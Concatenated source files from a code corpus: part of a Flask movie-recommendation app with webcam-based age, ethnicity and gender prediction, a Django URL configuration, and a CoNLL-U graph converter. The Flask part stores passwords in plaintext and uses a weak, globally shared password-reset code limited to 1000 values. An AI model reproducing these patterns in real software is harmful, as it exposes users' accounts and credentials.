            # otp_user_entry = details['verify']
            # if otp != conf_password:
            #     confirmed = 0
            #     msg = "Invalid Verification Code"
            #     return render_template('signup.html', dataToRender=msg)
            ######################################################
            try:
                # Insert the data to the database
                cur = mysql.connection.cursor()
                cur.execute("INSERT INTO users(First_Name, Last_Name, Email, Password) VALUES (%s, %s, %s, %s)", (regFirstName, regLastName, regEmail, regPass))
                cur.execute("INSERT INTO users_info(First_Name, Last_Name, Email, Password, Genre, Age, Ethnicity, Gender, Photo_path, Confirmed) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)", (regFirstName, regLastName, regEmail, regPass, genre, age, ethnicity, gender, photo_path, confirmed))
                mysql.connection.commit()
                cur.close()
                return redirect(url_for('login_signup'))
            except:
                # print('inside except', file=sys.stderr)
                # print(curr_user, file=sys.stderr)
                return render_template('login_signup.html')
    return render_template('login_signup.html')
##########################################################################
# Forget password page
@app.route('/forget',methods=['GET', 'POST'])
def forget():
    """Forget-password flow: verify the account e-mail, send/resend a
    6-digit OTP, and on a correct OTP stash the e-mail in the session and
    forward the user to the change-password page.

    Uses the module-level ``OTP`` global as shared state between the
    "resend" and "verify" form submissions.
    """
    confirmed = 0
    msg = ''
    global OTP
    if request.method == 'POST':
        email = request.form['email']
        # print('################### Inside POST ', file=sys.stderr)
        # print('email =', email, file=sys.stderr)
        try:
            # check if the email is in the database
            cur = mysql.connection.cursor()
            cur.execute("SELECT * FROM users WHERE Email = %s", (email,) )
            cur.execute("SELECT * FROM users_info WHERE Email = %s", (email,) )
            curr_user = cur.fetchall()[0]
            cur.close()
            if curr_user == ():
                msg = 'Email not found'
                return render_template('forget.html', message=msg)
        except:
            # fetchall()[0] raises IndexError for an unknown e-mail.
            msg = 'Email not found'
            # print('################### Inside Except DB ERROR', file=sys.stderr)
            return render_template('forget.html', message=msg)
        if "btn_verify_submit" in request.form:
            # Check user verification code
            otp_user_entry = request.form['verify_otp']
            if OTP != otp_user_entry:
                confirmed = 0
                msg = "Invalid Verification Code"
                # print('################### OTP not matched ', file=sys.stderr)
                return render_template('forget.html', message=msg)
            else:
                confirmed = 1
                # before_request falls back to an Email lookup for this.
                session['user_id'] = email
                # print('################### OTP matched ', file=sys.stderr)
                # print('session["user_id"] =', session['user_id'], file=sys.stderr)
                # print('g.user[0] =', g.user[0], file=sys.stderr)
                return redirect(url_for('change_pass'))
        if "btn_resend_submit" in request.form:
            # Create OTP
            OTP = str(random.randint(0, 999)).zfill(6)
            # Send verification code
            verify_mail(email, OTP)
            # print('################### OTP Resend', file=sys.stderr)
            return render_template('forget.html', storedEmail=email)
    ######################################################
    return render_template('forget.html')
#######################################################
# Change Password Page
@app.route('/change_pass', methods=['GET', 'POST'])
def change_pass():
    """Change-password page reached after a successful OTP verification.

    Updates the password for the e-mail stored in ``g.user`` (index 3) in
    both user tables, then returns to the login page.
    """
    if not g.user:
        return redirect(url_for('login_signup'))
    if request.method == "POST" :
        email = g.user[3]
        password = request.form['regConfPass']
        # Update the record in the database
        cur = mysql.connection.cursor()
        cur.execute("UPDATE users SET Password = %s WHERE Email = %s", (password, email) )
        cur.execute("UPDATE users_info SET Password = %s WHERE Email = %s", (password, email) )
        mysql.connection.commit()
        cur.close()
        return redirect(url_for('login_signup'))
    return render_template('change_pass.html')
#######################################################
# Home + Recommendation Page
@app.route('/home', methods=['GET', 'POST'])
def home():
    """Home page for logged-in users; on POST, build recommendations.

    Loads all interactions and movies from the DB, derives a per-movie
    popularity table, maps the stored age bucket to a representative age,
    calls ``recommend_movies`` and e-mails the result to the user.
    """
    if not g.user:
        return redirect(url_for('login_signup'))
    if request.method == "POST" :
        movie_genres = request.form['movie_genres']
        # print('################## movie_genres\n', movie_genres, file=sys.stderr)
        #################################################################
        # get all movies and users interactions from the database
        cur = mysql.connection.cursor()
        # cur.execute("SELECT Genre, Age, Ethnicity, Gender FROM users_info where id = %s", (g.user[0],))
        # cur.execute("SElECT Genre, Age, Ethnicity, Gender FROM users_info where id = %s", (7,))
        cur.execute("SELECT * FROM users_interactions")
        all_users_interactions = cur.fetchall()
        cur.execute("SELECT * FROM movies")
        all_movies = cur.fetchall()
        cur.close()
        # Convert the output to the dataframe
        users_interactions_df = pd.DataFrame(all_users_interactions)
        users_interactions_df.columns = ['bucketized_user_age', 'movie_genres', 'movie_id', 'movie_title', 'user_gender', 'user_id', 'user_rating', 'year']
        all_movies_df = pd.DataFrame(all_movies)
        all_movies_df.columns = ['movie_id', 'movie_genres', 'movie_title']
        # print('################## users_interactions_df\n', users_interactions_df, file=sys.stderr)
        # print('################## all_movies_df\n', all_movies_df, file=sys.stderr)
        # df_size: rating counts per movie, keeping only movies rated >50 times.
        df_size = pd.DataFrame(users_interactions_df.groupby('movie_id').size().sort_values(ascending=False))
        list(df_size.columns)
        df_size['size'] = df_size[0]
        df_size.drop(columns=[0],inplace=True)
        df_size = df_size[df_size['size']>50]
        most_pop=list(df_size.index)
        # print('################## df_size\n', df_size, file=sys.stderr)
        # Convert the age range into a single age within the range
        user_age_range = g.user[6]
        index = AGE_LABELS.index(user_age_range)
        age = DF_AGE_LABELS[index]
        # print('################## age\n', age, file=sys.stderr)
        # Get recommendations for the user
        recommendations = recommend_movies(n_top=10, age=int(age), gender=g.user[8], genre=movie_genres, df_ratings_final=users_interactions_df, df_size=df_size, df_movies=all_movies_df)
        # recommendations = recommend_movies(n_top=20, age=18, gender='Male', genre=['Action'], df_ratings_final=users_interactions_df, df_size=df_size, df_movies=all_movies_df)
        # print('################## recommendations\n', recommendations, file=sys.stderr)
        # Send recommendations to the user's email
        send_recommendations_to_mail(g.user, movie_genres, recommendations)
        return render_template('recommended_movies.html', len=len(recommendations), recommendations=recommendations)
    #######################
    return render_template('home.html', len=len(MOVIE_GENRES), MOVIE_GENRES=MOVIE_GENRES)
#######################################################
# Profile Page
@app.route('/profile')
def profile():
    """Show the profile page; anonymous visitors go back to the login page."""
    if g.user:
        return render_template('profile.html')
    return redirect(url_for('login_signup'))
#######################################################
# Edit profile page
@app.route('/profile_edit', methods=['GET', 'POST'])
def profile_edit():
    """Edit-profile page: on POST, write the submitted name/e-mail and the
    selected age/ethnicity/gender back to both user tables.

    Password (index 4) and photo path (index 9) are carried over unchanged
    from the current ``g.user`` row.
    """
    msg = ''
    if not g.user:
        return redirect(url_for('login_signup'))
    if request.method == "POST" :
        user_id = g.user[0]
        details = request.form
        first_name = details['fname']
        last_name = details['lname']
        email = details['email']
        password = g.user[4]
        age = details['age_labels_opt']
        ethnicity = details['ethnicity_labels_opt']
        gender = details['gender_labels_opt']
        photo_path = g.user[9]
        # Update the record in the database
        cur = mysql.connection.cursor()
        cur.execute("UPDATE users SET First_Name = %s, Last_Name = %s, Email = %s, Password = %s WHERE id = %s", (first_name, last_name, email, password, user_id))
        cur.execute("UPDATE users_info SET First_Name = %s, Last_Name = %s, Email = %s, Password = %s, Age = %s, Ethnicity = %s, Gender = %s, Photo_path = %s WHERE id = %s", (first_name, last_name, email, password, age, ethnicity, gender, photo_path, user_id))
        mysql.connection.commit()
        cur.close()
        msg = 'Changes Saved Successfully'
        return render_template('profile_edit.html', len=len(GENDER_LABELS), len_ETHNICITY=len(ETHNICITY_LABELS), len_AGE_LABELS=len(AGE_LABELS), GENDER_LABELS=GENDER_LABELS, ETHNICITY_LABELS=ETHNICITY_LABELS, AGE_LABELS=AGE_LABELS, Message=msg)
    return render_template('profile_edit.html', len=len(GENDER_LABELS), len_ETHNICITY=len(ETHNICITY_LABELS), len_AGE_LABELS=len(AGE_LABELS), GENDER_LABELS=GENDER_LABELS, ETHNICITY_LABELS=ETHNICITY_LABELS, AGE_LABELS=AGE_LABELS, Message=msg)
#######################################################
# Home + Recommendation for Guests Page
@app.route('/home_guest', methods=['GET', 'POST'])
def home_guest():
    """Guest recommendation page: no account needed.

    On POST a webcam photo is taken, age/gender are predicted from it, and
    recommendations are produced the same way as on /home.  Note that the
    DB loading below runs on every request, including GET.
    """
    #################################################################
    # get all movies and users interactions from the database
    cur = mysql.connection.cursor()
    # cur.execute("SELECT Genre, Age, Ethnicity, Gender FROM users_info where id = %s", (g.user[0],))
    # cur.execute("SElECT Genre, Age, Ethnicity, Gender FROM users_info where id = %s", (7,))
    cur.execute("SELECT * FROM users_interactions")
    all_users_interactions = cur.fetchall()
    cur.execute("SELECT * FROM movies")
    all_movies = cur.fetchall()
    cur.close()
    # Convert the output to the dataframe
    users_interactions_df = pd.DataFrame(all_users_interactions)
    users_interactions_df.columns = ['bucketized_user_age', 'movie_genres', 'movie_id', 'movie_title', 'user_gender', 'user_id', 'user_rating', 'year']
    all_movies_df = pd.DataFrame(all_movies)
    all_movies_df.columns = ['movie_id', 'movie_genres', 'movie_title']
    # print('################## users_interactions_df\n', users_interactions_df, file=sys.stderr)
    # print('################## all_movies_df\n', all_movies_df, file=sys.stderr)
    # df_size: rating counts per movie, keeping only movies rated >50 times.
    df_size = pd.DataFrame(users_interactions_df.groupby('movie_id').size().sort_values(ascending=False))
    list(df_size.columns)
    df_size['size'] = df_size[0]
    df_size.drop(columns=[0],inplace=True)
    df_size = df_size[df_size['size']>50]
    most_pop=list(df_size.index)
    # print('################## df_size\n', df_size, file=sys.stderr)
    if request.method == "POST" :
        movie_genres = request.form['movie_genres']
        # print('################## movie_genres\n', movie_genres, file=sys.stderr)
        # Take a photo after clicking register button
        photo_path = GUEST_PHOTO_PATH + 'guest_' + str(int(time.time())) + '_photo.jpg'
        # take_photo_timer(photo_path)
        # take_photo_detect_face(photo_path)
        take_photo_timer_detect_face(photo_path)
        # Predict age, gender & age for the user from the photo taken
        age = model_pred(AGE_MODEL_PATH, AGE_LABELS, photo_path)
        ethnicity = model_pred(ETHNICITY_MODEL_PATH, ETHNICITY_LABELS, photo_path)
        gender = model_pred(GENDER_MODEL_PATH, GENDER_LABELS, photo_path)
        # Convert the age range into a single age within the range
        user_age_range = age
        index = AGE_LABELS.index(user_age_range)
        age = DF_AGE_LABELS[index]
        # print('################## age\n', age, file=sys.stderr)
        # print('################## gender\n', gender, file=sys.stderr)
        # Get recommendations for the guest
        recommendations = recommend_movies(n_top=5, age=int(age), gender=gender, genre=movie_genres, df_ratings_final=users_interactions_df, df_size=df_size, df_movies=all_movies_df)
        # recommendations = recommend_movies(n_top=5, age=18, gender='Male', genre=['Action'], df_ratings_final=users_interactions_df, df_size=df_size, df_movies=all_movies_df)
        # print('################## recommendations\n', recommendations, file=sys.stderr)
        return render_template('recommended_movies.html', len=len(recommendations), recommendations=recommendations)
    #######################
    return render_template('home_guest.html', len=len(MOVIE_GENRES), MOVIE_GENRES=MOVIE_GENRES)
#######################################################
# 404 Page
# @app.route('/<page_name>')
# def other_page(page_name):
# response = make_response('The page named %s does not exist.' \
# % page_name, 404)
# return response
@app.errorhandler(404)
def page_not_found(error):
    """Plain-text fallback for URLs that match no registered route."""
    body = 'Page Not Found 404'
    return body
################################################ Functions ################################################
######################## Webcam + Face Detection Function ########################
def take_photo_detect_face(photo_path):
    """Open the webcam and loop until exactly one face is detected, then
    save the cropped face region to *photo_path*.

    Blocking: runs until the Haar cascade finds a single face in a frame.
    NOTE(review): the loop condition also exits when two-or-more faces drop
    back to zero detections between frames — confirm intended.
    """
    # Load the file to detect the faces
    faceCascade = cv2.CascadeClassifier(FACE_DETECTOR_PATH)
    # cascPath = sys.argv[1]
    # faceCascade = cv2.CascadeClassifier(cascPath)
    # Open the camera
    video_capture = cv2.VideoCapture(0)
    # Used in the while loop
    faces = ()
    face_images = []
    # If no face was detected or there is more than one face detected loop and don't capture photo
    while faces == () or len(face_images) > 1:
        # Capture frame-by-frame & convert to gray scale
        ret, frame = video_capture.read()
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        # minimize the frame
        faces = faceCascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)
        face_images= []
        # Draw a rectangle around the face
        for (x, y, w, h) in faces:
            cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
            # Get the area inside the rectangle (inset to drop the border)
            face_images.append( frame[y+2:y+h-1, x+2:x+w-1] )
            # cv2.imshow( frame[y:y+h, x:x+w] )
    # Display the resulting frame
    cv2.imshow('Camera', face_images[0])
    # print(face_images)
    # Save the frame
    cv2.imwrite(photo_path, face_images[0])
    # When everything is done, release the capture and close all opened windows
    video_capture.release()
    cv2.destroyAllWindows()
######################## Webcam Function ########################
def take_photo_timer(photo_path):
    """Show a 5-second on-screen countdown on the live webcam feed, then
    capture one frame and save it to *photo_path*.

    Blocking; opens and releases camera device 0 and all OpenCV windows.
    """
    # SET THE COUNTDOWN TIMER
    TIMER = int(5)
    # Open the camera
    cap = cv2.VideoCapture(0)
    # begin countdown
    prev = time.time()
    # Keep looping until photo is taken
    while TIMER >= 0:
        # Read and display each frame
        ret, img = cap.read()
        # Display countdown on each frame
        # specify the font and draw the countdown using putText
        font = cv2.FONT_HERSHEY_PLAIN
        cv2.putText(img, str(TIMER), (200, 250), font, 7, (255, 255, 255), 7, cv2.LINE_AA)
        cv2.imshow('Camera', img)
        cv2.waitKey(125)
        # current time
        cur = time.time()
        # Update and keep track of Countdown
        # if time elapsed is one second then decrease the counter
        if cur-prev >= 1:
            prev = cur
            TIMER = TIMER-1
    # Read and display each frame
    ret, img = cap.read()
    # Display the clicked frame for 2 sec. Also increased time by 1 sec in waitKey
    cv2.imshow('Photo', img)
    # time for which image displayed
    cv2.waitKey(1000)
    # Save the frame
    cv2.imwrite(photo_path, img)
    # close the camera
    cap.release()
    # close all the opened windows
    cv2.destroyAllWindows()
######################## Camera + Face Detection + Timer Function ########################
def take_photo_timer_detect_face(photo_path):
    """Combine face detection with a countdown: require exactly one face to
    stay in frame for a full 3-second countdown, then save the cropped face
    to *photo_path*.

    The countdown resets whenever zero or multiple faces are detected.
    Blocking; opens and releases camera device 0 and all OpenCV windows.
    """
    # This file is used to detect the faces
    faceCascade = cv2.CascadeClassifier(FACE_DETECTOR_PATH)
    # Used in the while loop
    faces = ()
    face_images = []
    # Open the camera
    cap = cv2.VideoCapture(0)
    # If no face was detected or there is more than one face detected loop and don't capture photo
    while faces == () or len(face_images) > 1:
        # Set the countdown timer
        TIMER = int(3)
        # begin countdown
        prev = time.time()
        # Keep looping until timer is over & photo is taken
        while TIMER >= 0:
            # Reset the countdown timer whenever there is no face or more than a face detected
            if faces == () or len(face_images) > 1:
                TIMER = int(3)
                prev = time.time()
            # Read and display each frame & convert to gray scale
            ret, frame = cap.read()
            gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
            # Display countdown on each frame
            # specify the font and draw the countdown using putText
            font = cv2.FONT_HERSHEY_COMPLEX_SMALL
            cv2.putText(frame, 'Show Your Face', (50, 50), font, 2, (255, 50, 50), 3, cv2.LINE_AA)
            cv2.putText(frame, str(TIMER), (50, 150), font, 3, (255, 50, 50), 3, cv2.LINE_AA)
            cv2.imshow('Camera', frame)
            cv2.waitKey(150)
            # find faces and reduce the image scale
            # returns the positions of detected faces as Rect(x,y,w,h).
            faces = faceCascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)
            face_images= []
            # Draw a rectangle around the face
            for (x, y, w, h) in faces:
                cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
                # Get the area inside the rectangle (inset to drop the border)
                face_images.append( frame[y+2:y+h-1, x+2:x+w-1] )
            # current time
            cur = time.time()
            # Update and keep track of Countdown
            # if time elapsed is one second then decrease the counter
            if cur-prev >= 1:
                prev = cur
                TIMER = TIMER-1
    # Read and display each frame
    ret, img = cap.read()
    # Display the clicked frame for 2 sec. Also increased time by 1 sec in waitKey
    cv2.imshow('Photo', face_images[0])
    # time for which image displayed
    cv2.waitKey(1000)
    # Save the frame
    cv2.imwrite(photo_path, face_images[0])
    # close the camera
    cap.release()
    # close all the opened windows
    cv2.destroyAllWindows()
######################## Model Function ########################
# Predict either age, ethnicity or gender prediction
def model_pred(MODEL_PATH, MODEL_LABELS, photo_path):
    """Run the Keras classifier stored at *MODEL_PATH* on the photo at
    *photo_path* and return the predicted label from *MODEL_LABELS*.

    The image is resized to 48x48, converted to grayscale and reshaped to
    (1, 48, 48, 1) — the input layout the bundled models were trained on.
    NOTE(review): the model is reloaded from disk on every call; caching
    the loaded models would make sign-up noticeably faster.
    """
    # Load the user photo & resize it
    img = cv2.imread(photo_path)
    # img = cv2.imread("static/user_photos/europeanPerson3.png")
    resized_img = cv2.resize(img, (48, 48))
    resized_img_gray = cv2.cvtColor(resized_img, cv2.COLOR_BGR2GRAY)
    resized_img_gray_shape = (1, 48, 48, 1)
    resized_img_gray = resized_img_gray.reshape(*resized_img_gray_shape)
    X = resized_img_gray
    # Load the model
    model = load_model(MODEL_PATH)
    pred = model.predict(X)
    # Selecting the model label that was predicted
    y_model_predict = np.argmax(pred,axis=1)
    prediction = MODEL_LABELS[int(y_model_predict)]
    return prediction
######################## Email Functions ########################
# Send Email Verfication
def verify_mail(email, otp):
    """Send the one-time verification code *otp* to *email*.

    Returns the literal string 'Sent' after handing the message to the
    configured Flask-Mail instance.
    """
    message = Message('Flask APP verification', sender = '<EMAIL>', recipients = [email])
    message.body = 'Your verification Code\n' + str(otp)
    mail.send(message)
    return 'Sent'
# Send mail to user
def send_recommendations_to_mail(user_info, movie_genres, recommendations):
    """E-mail the recommended movie titles to the user.

    *user_info* is a users_info DB row (index 1 = first name, index 3 =
    e-mail address); *movie_genres* is the genre string the user chose;
    *recommendations* is the list of titles.  Returns 'Sent'.
    """
    first_name = user_info[1]
    recipient = user_info[3]
    titles_block = ''.join(str(title) + '\n' for title in recommendations)
    message = Message('Movie Recommendations from Flask APP', sender ='<EMAIL>', recipients = [recipient] )
    message.body = ('Hello ' + first_name + ',' + '\n'
                    + 'Chosen Movie Genre : "' + movie_genres + '"\n'
                    + 'Here are some movie recommendations for you :' + '\n'
                    + titles_block + '\n'
                    + 'Enjoy ' + emoji.emojize(":grinning_face_with_big_eyes:"))
    mail.send(message)
    return 'Sent'
######################## Recommender Function ########################
def recommend_movies(n_top, age, gender, genre, df_ratings_final, df_size, df_movies):
    """Return up to *n_top* movie titles recommended for a viewer profile.

    Parameters
    ----------
    n_top : int
        Maximum number of titles to return.
    age : int
        Bucketized age matched against ``bucketized_user_age``.
    gender : str
        Matched against ``user_gender`` (e.g. 'Male' / 'Female').
    genre : str or iterable of str
        One genre name or a collection of names; a rating row qualifies
        when any of them occurs in its ``movie_genres`` string.
    df_ratings_final : pandas.DataFrame
        Interaction rows with at least bucketized_user_age, movie_genres,
        movie_id, user_gender, user_rating and year columns.
    df_size : pandas.DataFrame
        Per-movie rating counts with a ``size`` column, indexed by movie_id.
    df_movies : pandas.DataFrame
        Movie metadata with a ``movie_title`` column, joined on the index.

    Returns
    -------
    list
        Movie titles ordered by mean rating, then year, then popularity.
    """
    # Accept both a single genre string and an iterable of genre names —
    # the Flask routes pass a plain string, which the original code
    # iterated character by character.
    genres = [genre] if isinstance(genre, str) else list(genre)
    # Bug fix: the original tested ``if row.find(item):`` which is truthy
    # for every index except 0 — including -1, i.e. "not found" — and could
    # also leave ``exists`` shorter than the frame when nothing matched.
    # Use proper substring membership instead.
    exists = [
        1 if any(g in row for g in genres) else 0
        for row in df_ratings_final.movie_genres
    ]
    df_new = df_ratings_final.copy()
    df_new['exists'] = exists
    # Keep only interactions from the matching demographic and genre.
    df_new = df_new[(df_new['bucketized_user_age'] == age)
                    & (df_new['exists'] == 1)
                    & (df_new['user_gender'] == gender)]
    # Average the numeric columns per movie.  The original passed
    # 'user_rating' positionally, which landed on the ``numeric_only``
    # flag; make that intent explicit.
    df_new = df_new.groupby('movie_id').mean(numeric_only=True)
    # Attach popularity counts, then rank by rating, recency and popularity.
    df_new = pd.merge(df_new, df_size, left_index=True, right_index=True, how='left')
    df_new = df_new.sort_values(by=['user_rating', 'year', 'size'], ascending=False)
    final_df = pd.merge(df_new, df_movies, left_index=True, right_index=True, how='left')
    recommended_movies = list(final_df['movie_title'])[0:n_top]
    return recommended_movies
######################## RUN APP ########################
# test = get_all_users()
# print('test', test)
# __name__ gets the value "__main__" when executing the script
# Run when the script is executed
if __name__ == '__main__':
    # NOTE(review): debug=True enables the Werkzeug debugger — never run
    # this in production.
    app.run(debug=True)
config/urls.py | git-shuvam/recipe-app-api | 0 | 12757380 | from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
from rest_framework.documentation import include_docs_urls
urlpatterns = [
    path('admin/', admin.site.urls),
    # App-specific API routes; each app owns its own urls module.
    path('api/user/', include('apps.user.urls'), name='user'),
    path('api/recipe/', include('apps.recipe.urls'), name='recipe'),
    # Browsable API documentation generated by DRF's coreapi integration.
    path('docs/', include_docs_urls(title='Recipe App API')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)  # serve user uploads (DEBUG only)
| 1.609375 | 2 |
surface/converter.py | adaamko/surface_realization | 0 | 12757381 | <filename>surface/converter.py
import sys
import argparse
import json
import os
import re
from collections import defaultdict
from surface.utils import REPLACE_MAP, sanitize_word
def build_dictionaries(filepaths):
    """Scan CoNLL-U files and build lemma <-> anonymised-id mappings.

    Every distinct lower-cased lemma encountered is assigned a unique token
    of the form ``WORD<n>``.  Returns ``(word_to_id, id_to_word)``.

    NOTE(review): lemmas are registered only when a blank line flushes the
    sentence, so a file that does not end with a blank line silently drops
    its last sentence; head placeholders created by make_default_structure
    also map the empty string to an id.  Both behaviours are preserved.
    """
    word_to_id = {}
    id_to_word = {}
    graph_data = {}
    word_count = 1
    for filepath in filepaths:
        with open(filepath, "r") as f:
            for line in f:
                if line == "\n":
                    # End of sentence: register every lemma buffered for it.
                    for w in graph_data:
                        word = graph_data[w]["word"].lower()
                        if word not in word_to_id:
                            word_unique = "WORD" + str(word_count)
                            word_to_id[word] = word_unique
                            id_to_word[word_unique] = word
                            word_count += 1
                    graph_data = {}
                    continue
                if line.startswith("#"):
                    continue
                # Token line; columns used here: 0=id, 1=lemma, 3=tree POS,
                # 5=morphology, 6=head id, 7=UD edge.  (Unused columns were
                # previously bound to dead locals and have been removed.)
                fields = line.split("\t")
                word_id = fields[0]
                lemma = fields[1]
                tree_pos = fields[3]
                mor = fields[5]
                head = fields[6]
                ud_edge = fields[7]
                make_default_structure(graph_data, word_id)
                graph_data[word_id]["word"] = lemma
                graph_data[word_id]["tree_pos"] = sanitize_word(tree_pos)
                graph_data[word_id]["mor"] = mor
                make_default_structure(graph_data, head)
                graph_data[head]["deps"][word_id] = ud_edge
    return word_to_id, id_to_word
def get_args():
    """Parse and return the command-line arguments for the converter."""
    arg_parser = argparse.ArgumentParser(
        description="Convert conllu file to isi file")
    arg_parser.add_argument(
        "conll_file", type=str, help="path to the CoNLL file")
    return arg_parser.parse_args()
def to_tokenized_output(result_dir, output_dir):
    """Convert CoNLL files in ``result_dir`` into plain tokenized text files.

    For each file in ``result_dir`` a ``<basename>.txt`` is written to
    ``output_dir`` containing one ``#sent_id`` / ``#text`` header pair per
    sentence, with the surface tokens joined by single spaces.

    NOTE(review): a sentence is flushed only on a blank line, so input files
    that do not end with a blank line lose their final sentence.
    """
    for filename in os.listdir(result_dir):
        result_filename = os.path.join(result_dir, filename)
        output_filename = os.path.join(
            output_dir, filename.split(".")[0] + ".txt")
        sentences = []
        current_sentence = []
        with open(result_filename, "r") as f:
            for i, line in enumerate(f):
                if line == "\n":
                    # Sentence boundary: join the collected surface tokens.
                    sen = " ".join(current_sentence)
                    current_sentence = []
                    sentences.append(sen)
                if line.startswith("#"):
                    continue
                if line != "\n":
                    fields = line.split("\t")
                    word_id = fields[0]
                    # Column 2 holds the surface form in this pipeline.
                    word = fields[2]
                    current_sentence.append(word)
        with open(output_filename, "w") as f:
            for i, sentence in enumerate(sentences):
                f.write("#sent_id = " + str(i+1) + "\n")
                f.write("#text = " + sentence + "\n")
                f.write("\n")
def extract_rules(dev, word_to_id):
    """Walk a CoNLL-U file and build per-sentence "subgraph rules".

    For every token of each sentence, a rule records the token (anonymised
    word id + tree POS) and its dependents, each annotated with the UD edge
    label and a direction flag taken from the ``lin=`` morphological feature
    ("S" for ``lin=+``, "B" for ``lin=-``, None otherwise -- presumably the
    linearisation side relative to the head; confirm against the grammar).

    Returns ``(id_to_rules, id_to_sentence)`` keyed by 0-based sentence index.

    NOTE(review): ``noun_list``, ``words`` and ``rules`` are accumulated but
    never read; sentences are flushed only on blank lines.
    """
    graph_data = {}
    noun_list = []
    id_to_rules = defaultdict(list)
    id_to_sentence = {}
    sentences = 0
    with open(dev, "r") as f:
        for i, line in enumerate(f):
            if line == "\n":
                # Sentence boundary: turn the buffered graph into rules.
                words = []
                for w in graph_data:
                    words.append(graph_data[w]["word"])
                    subgraphs = {"root": None, "graph": []}
                    rules = []
                    if "tree_pos" not in graph_data[w]:
                        # Entry created only as a head (the virtual sentence
                        # root): emit a ROOT rule over its dependents.
                        subgraphs["root"] = "ROOT"
                        for dep in graph_data[w]["deps"]:
                            to_pos = graph_data[dep]["tree_pos"]
                            word = graph_data[dep]["word"].lower()
                            subgraphs["graph"].append(
                                {"to": (word.lower(), to_pos), "edge": "root", "dir": None})
                        id_to_rules[sentences].append(subgraphs)
                        continue
                    subgraphs["root"] = (
                        graph_data[w]["word"].lower(), graph_data[w]["tree_pos"])
                    for dep in graph_data[w]["deps"]:
                        edge_dep = graph_data[w]["deps"][dep]
                        to_pos = graph_data[dep]["tree_pos"]
                        word = graph_data[dep]["word"].lower()
                        mor = graph_data[dep]["mor"]
                        if "tree_pos" in graph_data[w]:  # always true on this path
                            if "lin=+" in mor:
                                subgraphs["graph"].append(
                                    {"to": (word.lower(), to_pos), "edge": edge_dep.replace(":", "_"), "dir": "S"})
                            elif "lin=-" in mor:
                                subgraphs["graph"].append(
                                    {"to": (word.lower(), to_pos), "edge": edge_dep.replace(":", "_"), "dir": "B"})
                            else:
                                subgraphs["graph"].append(
                                    {"to": (word.lower(), to_pos), "edge": edge_dep.replace(":", "_"), "dir": None})
                    id_to_rules[sentences].append(subgraphs)
                graph_data = {}
                noun_list = []
                sentences += 1
                continue
            if line.startswith("# text"):
                id_to_sentence[sentences] = line.strip()
            if line.startswith("#"):
                continue
            if line != "\n":
                fields = line.split("\t")
                word_id = fields[0]
                word = fields[2]
                lemma = fields[1]
                tree_pos = fields[3]
                ud_pos = fields[4]
                mor = fields[5]
                head = fields[6]
                ud_edge = fields[7]
                comp_edge = fields[8]
                space_after = fields[9]
                make_default_structure(graph_data, word_id)
                # Store the anonymised id for the lemma, not the lemma itself.
                graph_data[word_id]["word"] = word_to_id[lemma.lower()]
                graph_data[word_id]["tree_pos"] = sanitize_word(tree_pos)
                graph_data[word_id]["mor"] = mor
                make_default_structure(graph_data, head)
                graph_data[head]["deps"][word_id] = ud_edge
    return id_to_rules, id_to_sentence
def print_output(graph_data, graph_root):
    """Print the ISI graph string for the dependency graph rooted at *graph_root*."""
    graph_repr = make_graph_string(graph_data, graph_root)
    print(graph_repr)
def make_id_graph(graph_data, word_id, word_to_id):
    """Recursively render the subtree rooted at *word_id* in ISI graph
    notation, labelling each node "<anonymised-word>_<token-id>"."""
    node = graph_data[word_id]
    label = "{}_{}".format(word_to_id[node["word"]], word_id)
    parts = ["({0} / {0}".format(label)]
    for child_id, edge in node["deps"].items():
        parts.append(' :{} '.format(edge.replace(':', '_')))
        parts.append(make_id_graph(graph_data, child_id, word_to_id))
    parts.append(")")
    return "".join(parts)
def make_graph_string(graph_data, word_id):
    """Recursively render the dependency subtree at *word_id* in ISI graph
    notation, with ':' in edge labels replaced by '_'."""
    node = graph_data[word_id]
    pieces = ["({0} / {0}".format(node["word"])]
    for child_id, edge in node["deps"].items():
        pieces.append(' :{0} '.format(edge.replace(':', '_')))
        pieces.append(make_graph_string(graph_data, child_id))
    pieces.append(")")
    return "".join(pieces)
def sanitize_pos(pos):
    """Normalise a POS tag for the IRTG grammar.

    "HYPH" and tags made up entirely of mapped punctuation characters
    collapse to "PUNCT"; '|' and '=' (which the format cannot carry) are
    spelled out as "PIPE" / "EQUAL".

    NOTE(review): only membership in REPLACE_MAP (surface.utils) is used
    here -- assumed to enumerate punctuation characters; confirm.
    """
    if pos == "HYPH":
        pos = "PUNCT"
    pos = pos.replace("|", "PIPE").replace("=", "EQUAL")
    # Idiom fix: replaces the manual is_punct flag loop and `== True` test.
    # (An empty tag is still treated as punctuation, as before.)
    if all(character in REPLACE_MAP for character in pos):
        return "PUNCT"
    return pos
def convert(conll_file, word_to_id):
    """Convert a CoNLL-U file into ISI graph strings.

    Writes the graphs (interleaved with the "# text" comment lines) to
    "ewt_graphs" in IRTG corpus format and returns
    ``(id_to_graph, id_to_sentences, id_to_idgraph)`` keyed by 0-based
    sentence index.

    NOTE(review): ``sentences`` is never appended to, so "ewt_sentences" is
    always written empty; ``sentence``, ``words`` and ``ud_pos`` bookkeeping
    is likewise unread.  Preserved as-is pending clarification of intent.
    """
    sentences = []
    graphs = []
    words = defaultdict(int)
    id_to_sentences = {}
    id_to_graph = {}
    id_to_idgraph = {}
    with open(conll_file) as conll_file:
        graph_data = {}
        graph_root = "0"
        sen_id = 0
        for line in conll_file:
            if line == "\n":
                # Sentence boundary: render both the plain and the
                # id-anonymised graph for the buffered sentence.
                print(json.dumps(graph_data))
                graph = make_graph_string(graph_data, graph_root)
                id_graph = make_id_graph(graph_data, graph_root, word_to_id)
                graphs.append(graph)
                id_to_graph[sen_id] = graph
                id_to_idgraph[sen_id] = id_graph
                graph_data = {}
                graph_root = "0"
                words = defaultdict(int)
                sen_id += 1
                continue
            if line.startswith("# text ="):
                sentence = line.split("=")[1]
                graphs.append(line.strip())
                id_to_sentences[sen_id] = line.strip()
                continue
            elif line.startswith("#") or not line:
                continue
